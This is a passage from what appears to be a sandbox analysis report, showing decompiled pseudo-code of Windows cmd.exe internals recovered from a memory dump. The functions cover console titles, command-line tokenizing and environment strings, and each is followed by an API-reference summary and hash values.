                                    						_v104 = 1;
                                    						_v92 =  &_v56;
                                    						_v88 = _t149;
                                    						_v80 = 0;
                                    						while(1) {
                                    							__eflags =  *0x120b8b0;
                                    							if(__eflags != 0) {
                                    								goto L45;
                                    							}
                                    							__eflags = _v56 - 0x41;
                                    							if(__eflags == 0) {
                                    								goto L12;
                                    							}
                                    							_v16 = 0;
                                    							_t89 = E011E7797(_t118);
                                    							__eflags = _t89;
                                    							if(_t89 == 0) {
                                    								 *0x120b8b0 = 0x78;
                                    							} else {
                                    								 *0x120b8b0 =  *0x121c030( &_v108, 0, 0, 0);
                                    							}
                                    							_v16 = 0xfffffffe;
                                    							_t90 =  *0x120b8b0;
                                    							__eflags = _t90;
                                    							if(_t90 == 0) {
                                    								_t144 = _v56;
                                    								 *((short*)( *0x1213ce8 +  *0x1213ce4 * 8 - 4)) = _v56;
                                    								 *_t149 = _v56;
                                    								_t149[1] = _v54;
                                    								_t132 = 0x5c;
                                    								_t149[2] = _t132;
                                    								_t118 =  &(_v68[3]);
                                    								_t94 = _v60;
                                    								__eflags = _v60;
                                    								if(__eflags == 0) {
                                    									 *_t118 = 0;
                                    								} else {
                                    									_t144 = _v72;
                                    									E011E1040(_t118, _v72, _t94);
                                    								}
                                    								goto L12;
                                    							} else {
                                    								__eflags = _t90 - 0x55;
                                    								if(_t90 == 0x55) {
                                    									L41:
                                    									_v56 = (_v56 & 0x000000ff) - 1;
                                    									 *0x120b8b0 = 0;
                                    									continue;
                                    								}
                                    								__eflags = _t90 - 0x4b2;
                                    								if(_t90 != 0x4b2) {
                                    									continue;
                                    								}
                                    								goto L41;
                                    							}
                                    						}
                                    						goto L45;
                                    					}
                                    					goto L12;
                                    				} else {
                                    					_t138 = _t149;
                                    					_t163 =  *_t149;
                                    					L3:
                                    					_v60 = _t65;
                                    					if(_t163 != 0) {
                                    						_t65 = _t138;
                                    						_t138 =  &(_t138[1]);
                                    						__eflags =  *_t138;
                                    						goto L3;
                                    					}
                                    					L4:
                                    					while(_t65 > _t149 && iswspace( *_t65 & 0x0000ffff) != 0) {
                                    						_t109 = _v60;
                                    						 *_t109 = 0;
                                    						_t65 = _t109 - 2;
                                    						_v60 = _t65;
                                    					}
                                    					goto L6;
                                    				}
                                    			}

                                    0x011ef4cc
                                    0x011ef4d9
                                    0x011ef4df
                                    0x011ef4e3
                                    0x00000000
                                    0x011ef4e3
                                    0x011ef4ce
                                    0x011ef4d3
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ef4d3
                                    0x011ef4c7
                                    0x00000000
                                    0x011ef44d
                                    0x00000000
                                    0x011e5ec8
                                    0x011e5ec8
                                    0x011e5eca
                                    0x011e5ed7
                                    0x011e5ed7
                                    0x011e5eda
                                    0x011e5ecf
                                    0x011e5ed1
                                    0x011e5ed4
                                    0x00000000
                                    0x011e5ed4
                                    0x00000000
                                    0x011e5edc
                                    0x011ef382
                                    0x011ef385
                                    0x011ef388
                                    0x011ef38b
                                    0x011ef38b
                                    0x00000000
                                    0x011e5edc

                                    APIs
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                    • iswspace.MSVCRT ref: 011E5EE4
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: wcschr$iswspace
                                    • String ID:
                                    • API String ID: 3458554142-0
                                    • Opcode ID: 2f347b8b191ff2ab8cbf37c7dcaed0dd981b1f1bb93bcb850c433d11c379fef6
                                    • Instruction ID: 010b64fdb8a305bacb96ac5723d9e6f551a3aa69f37ae9c0de960ea80e4a7937
                                    • Opcode Fuzzy Hash: 2f347b8b191ff2ab8cbf37c7dcaed0dd981b1f1bb93bcb850c433d11c379fef6
                                    • Instruction Fuzzy Hash: A991C174904A05DEEB2DDFA8E84CAAEBBF5FF58714F10811EE805D7294EB304541CB56
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 77%
                                    			E011DB2B0(WCHAR* __ecx, signed int _a4) {
                                    				signed int _v12;
                                    				long _v536;
                                    				wchar_t* _v540;
                                    				wchar_t* _v544;
                                    				wchar_t* _v548;
                                    				signed int _v552;
                                    				WCHAR* _v556;
                                    				intOrPtr _v560;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t32;
                                    				long _t35;
                                    				void* _t38;
                                    				short _t47;
                                    				wchar_t* _t48;
                                    				intOrPtr _t49;
                                    				intOrPtr* _t50;
                                    				intOrPtr _t51;
                                    				signed int _t54;
                                    				WCHAR* _t55;
                                    				signed int _t62;
                                    				intOrPtr* _t63;
                                    				WCHAR* _t70;
                                    				intOrPtr _t77;
                                    				wchar_t* _t79;
                                    				WCHAR* _t80;
                                    				wchar_t* _t81;
                                    				signed int _t82;
                                    
                                    				_t65 = __ecx;
                                    				_t32 =  *0x11fd0b4; // 0x2833377e
                                    				_v12 = _t32 ^ _t82;
                                    				_t62 = _a4;
                                    				_t76 =  &_v544;
                                    				_v552 = _t62;
                                    				_v548 = 0;
                                    				_v540 = 0;
                                    				_t35 = E011DB42E( &_v544);
                                    				if(_t35 < 0) {
                                    					SetLastError(RtlNtStatusToDosError(_t35));
                                    					L23:
                                    					if(_t62 == 0) {
                                    						_t62 = 0;
                                    						_t80 = 0;
                                    						L12:
                                    						if(_t80 != 0) {
                                    							SetConsoleTitleW(_t80);
                                    							 *0x11fd59c = _t62;
                                    						}
                                    						L14:
                                    						_t77 = 0;
                                    						if(_v548 == 0) {
                                    							L17:
                                    							_t38 = _v540;
                                    							if(_t38 != 0) {
                                    								LocalFree(_t38);
                                    							}
                                    							if(_t77 != 0) {
                                    								L29:
                                    								_push(0);
                                    								_push(8);
                                    								E011DC5A2(_t65);
                                    								goto L20;
                                    							} else {
                                    								L20:
                                    								return E011E6FD0(_t77, _t62, _v12 ^ _t82, _t76, _t77, _t80);
                                    							}
                                    						}
                                    						L15:
                                    						if(_t80 != 0) {
                                    							_t65 = _t80;
                                    							E011E0040(_t80);
                                    						}
                                    						goto L17;
                                    					}
                                    					_t65 =  *(_t62 + 0x3c);
                                    					_t80 = E011DDEF9( *(_t62 + 0x3c));
                                    					if(_t80 == 0) {
                                    						goto L14;
                                    					}
                                    					_t70 = _t80;
                                    					_t62 = 0;
                                    					_t21 =  &(_t70[1]); // 0x2
                                    					_t76 = _t21;
                                    					do {
                                    						_t47 =  *_t70;
                                    						_t70 =  &(_t70[1]);
                                    					} while (_t47 != 0);
                                    					_t65 = _t70 - _t76 >> 1;
                                    					if(_t70 - _t76 >> 1 < 0x104) {
                                    						goto L12;
                                    					}
                                    					_t77 = 1;
                                    					goto L29;
                                    				}
                                    				_t48 = _v544;
                                    				if(_t48 >= 3) {
                                    					_t48 = _t48 + 0xfffffff0;
                                    				}
                                    				if(_t48 != 0) {
                                    					goto L23;
                                    				} else {
                                    					_t49 = _t48 + 1;
                                    					_t77 = _t49;
                                    					_v548 = _t49;
                                    					_v560 = _t77;
                                    					_t50 = E011DB3FC(_t65);
                                    					_v540 = _t50;
                                    					_t65 = 0x40002748;
                                    					if(_t50 == 0) {
                                    						goto L29;
                                    					} else {
                                    						_t63 = _t50;
                                    						_t76 = 0;
                                    						_t11 = _t63 + 2; // 0x2
                                    						_t65 = _t11;
                                    						do {
                                    							_t51 =  *_t63;
                                    							_t63 = _t63 + 2;
                                    						} while (_t51 != 0);
                                    						_t62 = _t63 - _t65 >> 1;
                                    						if(_t62 >= 0x104) {
                                    							goto L17;
                                    						}
                                    						_t65 = 0x208;
                                    						_t80 = E011E00B0(0x208);
                                    						_v556 = _t80;
                                    						if(_t80 == 0) {
                                    							goto L17;
                                    						}
                                    						_t76 = 0x104;
                                    						_t65 = _t80;
                                    						E011E1040(_t80, 0x104, _v540);
                                    						_t54 = _v552;
                                    						if(_t54 == 0) {
                                    							_t55 =  &_v536;
                                    							_v544 = _t55;
                                    							if(GetConsoleTitleW(_t55, 0x104) == 0) {
                                    								goto L15;
                                    							}
                                    							if(wcsstr( &_v536, _v540) == 0) {
                                    								L36:
                                    								_t76 = 0x104;
                                    								_t65 = _t80;
                                    								if(E011E18C0(_t80, 0x104, _v544) != 0) {
                                    									goto L15;
                                    								}
                                    								L11:
                                    								_t62 = 0;
                                    								goto L12;
                                    							}
                                    							_t79 = _v540;
                                    							_t81 =  &_v536;
                                    							_t62 = _t62 + _t62;
                                    							do {
                                    								_t81 = _t81 + _t62;
                                    							} while (wcsstr(_t81, _t79) != 0);
                                    							_t77 = _v560;
                                    							_v544 = _t81;
                                    							_t80 = _v556;
                                    							goto L36;
                                    						}
                                    						if( *((intOrPtr*)(_t54 + 0x3c)) == 0) {
                                    							_t65 = 0;
                                    							_t77 = 0;
                                    							goto L15;
                                    						}
                                    						_t76 = 0x104;
                                    						_t65 = _t80;
                                    						if(E011E18C0(_t80, 0x104,  *((intOrPtr*)(_t54 + 0x3c))) != 0) {
                                    							goto L15;
                                    						}
                                    						goto L11;
                                    					}
                                    				}
                                    			}

                                    APIs
                                      • Part of subcall function 011DB42E: NtOpenThreadToken.NTDLL(000000FE,00000008,00000000,00000000), ref: 011DB448
                                      • Part of subcall function 011DB42E: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 011DB460
                                      • Part of subcall function 011DB42E: NtClose.NTDLL(00000000), ref: 011DB4B1
                                    • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 011DB3A5
                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 011DB3D3
                                    • RtlNtStatusToDosError.NTDLL ref: 011F133F
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011F1346
                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?), ref: 011F13B6
                                    • wcsstr.MSVCRT ref: 011F13D1
                                    • wcsstr.MSVCRT ref: 011F13EF
                                      • Part of subcall function 011DB3FC: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,011F95EF,011E9564,00000001,?), ref: 011DB421
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                    • String ID:
                                    • API String ID: 1313749407-0
                                    • Opcode ID: 83904959c6b92378cdc39627f5e44b6eacf0c5795969984e008f468defc49b64
                                    • Instruction ID: f37d632e44a7e370380b39cf19f060590834647b2277249efc6ea4713143e61b
                                    • Opcode Fuzzy Hash: 83904959c6b92378cdc39627f5e44b6eacf0c5795969984e008f468defc49b64
                                    • Instruction Fuzzy Hash: A5512A31A0821AABDF2C9FB99C987AE77A4EF55314F1500ADDE06D7244DF30CE818B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 71%
                                    			E011DE9A0(long __ecx, void* __eflags) {
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t62;
                                    				signed int _t63;
                                    				long _t64;
                                    				wchar_t* _t66;
                                    				signed char _t67;
                                    				signed int _t68;
                                    				int _t70;
                                    				signed int _t71;
                                    				signed int _t72;
                                    				signed int _t74;
                                    				long _t75;
                                    				void* _t78;
                                    				long _t83;
                                    				void* _t86;
                                    				void* _t92;
                                    				signed int* _t95;
                                    				int _t97;
                                    				long _t99;
                                    				wchar_t* _t101;
                                    				wchar_t* _t104;
                                    				wchar_t* _t106;
                                    				wchar_t* _t109;
                                    				long _t111;
                                    				wchar_t* _t114;
                                    				signed int _t117;
                                    				void* _t118;
                                    				signed short* _t123;
                                    				long _t124;
                                    				long _t125;
                                    				signed int _t138;
                                    				void* _t139;
                                    				long _t142;
                                    				signed int _t146;
                                    				void* _t149;
                                    				signed int _t152;
                                    				long _t153;
                                    				void* _t157;
                                    				signed int _t159;
                                    				signed int* _t160;
                                    				signed int _t163;
                                    				void* _t164;
                                    				void* _t168;
                                    				void* _t171;
                                    				signed short* _t173;
                                    				long _t174;
                                    				signed int _t177;
                                    				void* _t179;
                                    				void* _t180;
                                    				void* _t183;
                                    				signed int _t184;
                                    				void* _t188;
                                    
                                    				_t173 = __ecx;
                                    				_t121 = 0x50;
                                    				_push(_t160);
                                    				_t114 = E011E00B0(0x50);
                                    				if(_t114 == 0) {
                                    					E011F9287(0x50);
                                    					__imp__longjmp(0x120b8b8, 1);
                                    					goto L91;
                                    				} else {
                                    					 *_t114 = __ecx;
                                    					_t114[0x10] = 0;
                                    					_t121 =  *0x120fa8c +  *0x120fa8c;
                                    					_t111 = E011E00B0( *0x120fa8c +  *0x120fa8c);
                                    					if(_t111 == 0) {
                                    						L91:
                                    						E011F9287(_t121);
                                    						__imp__longjmp(0x120b8b8, 1);
                                    						asm("int3");
                                    						E011F9287(_t121);
                                    						__imp__longjmp(0x120b8b8, 1);
                                    						E011F9287(_t121);
                                    						__imp__longjmp(0x120b8b8, 1);
                                    						L94:
                                    						while(1) {
                                    							if(E011DD7D4(_t114,  *_t173) != 0) {
                                    								L17:
                                    								 *(_t184 - 0xdc) = 0;
                                    								if(_t114 == 0) {
                                    									L19:
                                    									 *_t160 =  *_t173;
                                    									_t160 =  &(_t160[0]);
                                    									if( *_t173 == 0x22) {
                                    										while(1) {
                                    											_t62 = _t173[1];
                                    											_t123 = _t173;
                                    											_t173 =  &(_t173[1]);
                                    											 *_t160 = _t62;
                                    											_t160 =  &(_t160[0]);
                                    											_t63 =  *_t173 & 0x0000ffff;
                                    											if(_t63 == 0) {
                                    												break;
                                    											}
                                    											if(_t63 == 0x22) {
                                    												goto L20;
                                    											} else {
                                    												if(_t173[1] != 0) {
                                    													continue;
                                    												} else {
                                    													goto L20;
                                    												}
                                    											}
                                    											goto L22;
                                    										}
                                    										_t173 = _t123;
                                    									}
                                    									L20:
                                    									 *(_t184 - 0xd8) = 0;
                                    								} else {
                                    									_t66 = wcschr(_t114,  *_t173 & 0x0000ffff);
                                    									_t188 = _t188 + 8;
                                    									if(_t66 != 0) {
                                    										_t67 =  *(_t184 + 8);
                                    										if((_t67 & 0x00000002) != 0) {
                                    											_t68 =  *_t173 & 0x0000ffff;
                                    											if( *(_t184 - 0xd8) == 0) {
                                    												_t160 =  &(_t160[0]);
                                    											}
                                    											 *_t160 = _t68;
                                    											 *(_t184 - 0xd8) = 1;
                                    											_t160 =  &(_t160[1]);
                                    										} else {
                                    											if((_t67 & 0x00000004) != 0) {
                                    												 *_t160 =  *_t173;
                                    											}
                                    											 *(_t184 - 0xd8) = 0;
                                    											_t160 =  &(_t160[0]);
                                    										}
                                    									} else {
                                    										goto L19;
                                    									}
                                    								}
                                    								_t64 = _t173[1] & 0x0000ffff;
                                    								_t173 =  &(_t173[1]);
                                    								_t124 = _t64;
                                    								if(_t64 != 0) {
                                    									goto L14;
                                    								}
                                    							} else {
                                    								L29:
                                    								_t75 =  *_t173 & 0x0000ffff;
                                    								if(_t75 != 0) {
                                    									_t142 = _t75;
                                    									while(_t142 != 0x22) {
                                    										_t97 = iswspace(_t142);
                                    										_t188 = _t188 + 4;
                                    										if(_t97 != 0) {
                                    											L39:
                                    											if( *(_t184 - 0xe0) == 0 || _t114 == 0) {
                                    												L42:
                                    												if( *(_t184 - 0xe4) != 0) {
                                    													if(E011DD7D4(_t114,  *_t173) != 0) {
                                    														break;
                                    													} else {
                                    														goto L43;
                                    													}
                                    												} else {
                                    													L43:
                                    													_t99 = _t173[1] & 0x0000ffff;
                                    													_t173 =  &(_t173[1]);
                                    													_t142 = _t99;
                                    													if(_t99 != 0) {
                                    														continue;
                                    													} else {
                                    													}
                                    												}
                                    											} else {
                                    												_t101 = wcschr(_t114,  *_t173 & 0x0000ffff);
                                    												_t188 = _t188 + 8;
                                    												if(_t101 != 0) {
                                    													break;
                                    												} else {
                                    													goto L42;
                                    												}
                                    											}
                                    										} else {
                                    											_t104 = wcschr(_t184 - 0xd4,  *_t173 & 0x0000ffff);
                                    											_t188 = _t188 + 8;
                                    											if(_t104 != 0) {
                                    												goto L39;
                                    											} else {
                                    												break;
                                    											}
                                    										}
                                    										goto L22;
                                    									}
                                    									if( *_t173 != 0) {
                                    										if( *(_t184 - 0xdc) == 0 &&  *(_t184 - 0xd8) == 0) {
                                    											_t160 =  &(_t160[0]);
                                    										}
                                    										 *(_t184 - 0xd8) = 1;
                                    										goto L17;
                                    										do {
                                    											do {
                                    												do {
                                    													do {
                                    														goto L17;
                                    														L14:
                                    													} while (_t124 == 0x22);
                                    													_t70 = iswspace(_t124);
                                    													_t188 = _t188 + 4;
                                    													if(_t70 != 0) {
                                    														break;
                                    													} else {
                                    														goto L16;
                                    													}
                                    													goto L22;
                                    													L16:
                                    													_t109 = wcschr(_t184 - 0xd4,  *_t173 & 0x0000ffff);
                                    													_t188 = _t188 + 8;
                                    												} while (_t109 == 0);
                                    												_t71 =  *(_t184 + 8);
                                    												if((_t71 & 0x00000001) != 0) {
                                    													goto L54;
                                    												} else {
                                    													L25:
                                    													_t72 = _t71 & 0x00000002;
                                    													 *(_t184 - 0xe0) = _t72;
                                    													if(_t72 == 0 || _t114 == 0) {
                                    														goto L28;
                                    													} else {
                                    														goto L27;
                                    													}
                                    												}
                                    												goto L22;
                                    												L54:
                                    											} while ( *(_t184 - 0xdc) == 0);
                                    											goto L25;
                                    											L27:
                                    											_t106 = wcschr(_t114,  *_t173 & 0x0000ffff);
                                    											_t188 = _t188 + 8;
                                    										} while (_t106 != 0);
                                    										L28:
                                    										_t74 =  *(_t184 + 8) & 0x00000004;
                                    										 *(_t184 - 0xe4) = _t74;
                                    										if(_t74 != 0) {
                                    											continue;
                                    										} else {
                                    											goto L29;
                                    										}
                                    									}
                                    								}
                                    							}
                                    							L22:
                                    							_t125 =  *(_t184 - 0xe8);
                                    							_t163 = _t160 - _t125 >> 1;
                                    							_t148 = 4 + _t163 * 2;
                                    							if(E011E0100(_t125, 4 + _t163 * 2) == 0) {
                                    								E011F9287(_t125);
                                    								__imp__longjmp(0x120b8b8, 1);
                                    								asm("int3");
                                    								while(1) {
                                    									L100:
                                    									_t149 = _t125 + 2;
                                    									do {
                                    										_t78 =  *_t125;
                                    										_t125 = _t125 + 2;
                                    									} while (_t78 != 0);
                                    									_t164 = _t163 + (_t125 - _t149 >> 1);
                                    									while(1) {
                                    										L64:
                                    										_t128 = _t164 + _t164;
                                    										_t174 = E011E00B0(_t164 + _t164);
                                    										 *(_t184 - 4) = _t174;
                                    										if(_t174 == 0) {
                                    											break;
                                    										}
                                    										_t130 = _t114[0xf];
                                    										if(_t114[0xf] != 0) {
                                    											E011E1040(_t174, _t164, _t130);
                                    										}
                                    										_t86 = 0;
                                    										if(_t164 == 0 || _t164 > 0x7fffffff) {
                                    											_t86 = 0x80070057;
                                    										}
                                    										if(_t86 < 0) {
                                    											L107:
                                    											_t152 = 0;
                                    										} else {
                                    											_t86 = 0;
                                    											_t139 = _t164;
                                    											_t153 = _t174;
                                    											if(_t164 == 0) {
                                    												L106:
                                    												_t86 = 0x80070057;
                                    												goto L107;
                                    											} else {
                                    												while( *_t153 != _t86) {
                                    													_t153 = _t153 + 2;
                                    													_t139 = _t139 - 1;
                                    													if(_t139 != 0) {
                                    														continue;
                                    													} else {
                                    														goto L106;
                                    													}
                                    													goto L73;
                                    												}
                                    												if(_t139 == 0) {
                                    													goto L106;
                                    												} else {
                                    													_t152 = _t164 - _t139;
                                    												}
                                    											}
                                    										}
                                    										L73:
                                    										if(_t86 >= 0) {
                                    											_t95 =  *(_t184 - 4) + _t152 * 2;
                                    											_t179 = _t164 - _t152;
                                    											if(_t179 == 0) {
                                    												L79:
                                    												_t95 = _t95 - 2;
                                    											} else {
                                    												_t157 = _t152 + 0x7ffffffe + _t179 - _t164;
                                    												_t164 = 0x120faa0 - _t95;
                                    												while(_t157 != 0) {
                                    													_t138 =  *(_t164 + _t95) & 0x0000ffff;
                                    													if(_t138 == 0) {
                                    														break;
                                    													} else {
                                    														 *_t95 = _t138;
                                    														_t157 = _t157 - 1;
                                    														_t95 =  &(_t95[0]);
                                    														_t179 = _t179 - 1;
                                    														if(_t179 != 0) {
                                    															continue;
                                    														} else {
                                    															goto L79;
                                    														}
                                    													}
                                    													goto L81;
                                    												}
                                    												if(_t179 == 0) {
                                    													goto L79;
                                    												}
                                    											}
                                    											L81:
                                    											_t174 =  *(_t184 - 4);
                                    											 *_t95 = 0;
                                    										}
                                    										_t114[0xf] = _t174;
                                    										while(E011DEEC8() != 0) {
                                    											if(E011DF030(1) == 0x4000) {
                                    												_t125 = _t114[0xf];
                                    												_t163 =  *0x120fa8c;
                                    												if(_t125 != 0) {
                                    													goto L100;
                                    												}
                                    												goto L64;
                                    											} else {
                                    												_t177 =  *(_t184 - 8);
                                    												if(E011E02B0(_t114, _t177, _t164, _t177) != 0) {
                                    													_t92 =  *_t177;
                                    													do {
                                    														_t51 = _t92 + 0x14; // 0x14
                                    														_t117 = _t51;
                                    														_t92 =  *_t117;
                                    														 *(_t184 - 8) = _t117;
                                    													} while (_t92 != 0);
                                    													_t114 =  *(_t184 - 0x10);
                                    													continue;
                                    												} else {
                                    													E011DF300(_t91, 0, 0, _t91);
                                    													break;
                                    												}
                                    											}
                                    											goto L112;
                                    										}
                                    										_t114[0xd] =  *(_t184 - 0xc);
                                    										return _t114;
                                    										goto L112;
                                    									}
                                    									E011F9287(_t128);
                                    									__imp__longjmp(0x120b8b8, 1);
                                    									asm("int3");
                                    									if( *0x120fa90 != 0) {
                                    										E011F82EB(_t128);
                                    									}
                                    									 *0x11fd5c8 = 0;
                                    									if( *0x120fa88 != 0) {
                                    										E011F8121(_t174, 0);
                                    									}
                                    									_t83 = _t174;
                                    									return _t83;
                                    									goto L112;
                                    								}
                                    							} else {
                                    								_pop(_t168);
                                    								_pop(_t180);
                                    								_pop(_t118);
                                    								return E011E6FD0(_t76, _t118,  *(_t184 - 8) ^ _t184, _t148, _t168, _t180);
                                    							}
                                    							goto L112;
                                    						}
                                    					} else {
                                    						_t159 =  *0x120fa8c;
                                    						_t114[0xe] = _t111;
                                    						if(_t159 != 0) {
                                    							if(_t159 > 0x7fffffff) {
                                    								if(_t159 != 0) {
                                    									goto L10;
                                    								}
                                    							} else {
                                    								_t183 = 0x7ffffffe - _t159;
                                    								_t171 = 0x120faa0 - _t111;
                                    								while(_t183 + _t159 != 0) {
                                    									_t146 =  *(_t171 + _t111) & 0x0000ffff;
                                    									if(_t146 == 0) {
                                    										break;
                                    									} else {
                                    										 *_t111 = _t146;
                                    										_t111 = _t111 + 2;
                                    										_t159 = _t159 - 1;
                                    										if(_t159 != 0) {
                                    											continue;
                                    										} else {
                                    											L8:
                                    											_t111 = _t111 - 2;
                                    										}
                                    									}
                                    									L10:
                                    									 *_t111 = 0;
                                    									goto L11;
                                    								}
                                    								if(_t159 == 0) {
                                    									goto L8;
                                    								}
                                    								goto L10;
                                    							}
                                    						}
                                    						L11:
                                    						return _t114;
                                    					}
                                    				}
                                    				L112:
                                    			}

























































                                    0x011dedbe
                                    0x011dedbe
                                    0x011dedca
                                    0x011deeb2
                                    0x011deeb4
                                    0x011deeb4
                                    0x011deeb4
                                    0x011deeb7
                                    0x011deeb9
                                    0x011deebc
                                    0x011deec0
                                    0x00000000
                                    0x011dedd0
                                    0x011dedd5
                                    0x00000000
                                    0x011dedd5
                                    0x011dedca
                                    0x00000000
                                    0x011dedbc
                                    0x011dedde
                                    0x011dede8
                                    0x00000000
                                    0x011dede8
                                    0x011ec0f7
                                    0x011ec103
                                    0x011ec109
                                    0x011ec111
                                    0x011ec117
                                    0x011ec117
                                    0x011defea
                                    0x011defef
                                    0x011ec125
                                    0x011ec125
                                    0x011deff5
                                    0x011deffb
                                    0x00000000
                                    0x011deffb
                                    0x011debcb
                                    0x011debce
                                    0x011debcf
                                    0x011debd2
                                    0x011debdb
                                    0x011debdb
                                    0x00000000
                                    0x011debc5
                                    0x011de9d9
                                    0x011de9d9
                                    0x011de9df
                                    0x011de9e4
                                    0x011de9ec
                                    0x011dea31
                                    0x00000000
                                    0x011dea33
                                    0x011de9ee
                                    0x011de9f8
                                    0x011de9fa
                                    0x011dea00
                                    0x011dea07
                                    0x011dea0e
                                    0x00000000
                                    0x011dea10
                                    0x011dea10
                                    0x011dea13
                                    0x011dea16
                                    0x011dea19
                                    0x00000000
                                    0x011dea1b
                                    0x011dea1b
                                    0x011dea1b
                                    0x011dea1b
                                    0x011dea19
                                    0x011dea24
                                    0x011dea26
                                    0x00000000
                                    0x011dea26
                                    0x011dea22
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dea22
                                    0x011de9ec
                                    0x011dea29
                                    0x011dea2e
                                    0x011dea2e
                                    0x011de9d3
                                    0x00000000

                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • wcschr.MSVCRT ref: 011DEB6D
                                    • iswspace.MSVCRT ref: 011DEC37
                                    • wcschr.MSVCRT ref: 011DEC4F
                                    • longjmp.MSVCRT(0120B8B8,00000001,?,00000000,?,011DED9F,?,00000000,?), ref: 011EC024
                                    • longjmp.MSVCRT(0120B8B8,00000001), ref: 011EC036
                                    • longjmp.MSVCRT(0120B8B8,00000001,00000000,?,?), ref: 011EC049
                                    • longjmp.MSVCRT(0120B8B8,00000001), ref: 011EC05B
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: longjmp$Heapwcschr$AllocProcessiswspace
                                    • String ID:
                                    • API String ID: 2511250921-0
                                    • Opcode ID: 3d4d02ac21de062d6b759fcc972b96764ad1eb02ee49e1031271a5df004417e0
                                    • Instruction ID: 855c1b3e7172a5eb656384bddc97ad64c30c504bc0c15a4a9b2322f28b364cc7
                                    • Opcode Fuzzy Hash: 3d4d02ac21de062d6b759fcc972b96764ad1eb02ee49e1031271a5df004417e0
                                    • Instruction Fuzzy Hash: 14412C31601212C7EF3C5F6CD8987B637A5EF90706F04056EE9469B185EF709884CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 61%
                                    			E011F93E2(void* __ecx, intOrPtr __edx) {
                                    				intOrPtr _v8;
                                    				signed int _v16;
                                    				short _v18;
                                    				short _v20;
                                    				short _v22;
                                    				char _v24;
                                    				int _v36;
                                    				char _v40;
                                    				signed int _v44;
                                    				void _v564;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t39;
                                    				short _t51;
                                    				short _t53;
                                    				void* _t58;
                                    				void* _t59;
                                    				WCHAR* _t61;
                                    				int _t62;
                                    				short* _t75;
                                    				void* _t76;
                                    				short _t77;
                                    				int _t86;
                                    				void* _t87;
                                    				void* _t89;
                                    				void* _t90;
                                    				WCHAR* _t91;
                                    				signed int _t96;
                                    
                                    				_t83 = __edx;
                                    				_t68 = _t96;
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_v8 =  *((intOrPtr*)(_t96 + 4));
                                    				_t94 = (_t96 & 0xfffffff8) + 4;
                                    				_t39 =  *0x11fd0b4; // 0x2833377e
                                    				_v16 = _t39 ^ (_t96 & 0xfffffff8) + 0x00000004;
                                    				_v40 = 1;
                                    				_t86 = 0;
                                    				_v36 = 0x104;
                                    				_v44 = _v44 & 0;
                                    				_t89 = __ecx;
                                    				memset( &_v564, 0, 0x104);
                                    				if(E011E0C70( &_v564, ((0 | _v40 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
                                    					L23:
                                    					__imp__??_V@YAXPAX@Z(_v44);
                                    					_pop(_t87);
                                    					_pop(_t90);
                                    					return E011E6FD0(_t49, _t68, _v16 ^ _t94, _t83, _t87, _t90);
                                    				}
                                    				_t51 = 0x3d;
                                    				_v24 = _t51;
                                    				_v22 = _t89 + 0x40;
                                    				_t53 = 0x3a;
                                    				_v20 = _t53;
                                    				_v18 = 0;
                                    				_t91 = E011DCFBC( &_v24);
                                    				if(_t91 == 0) {
                                    					L4:
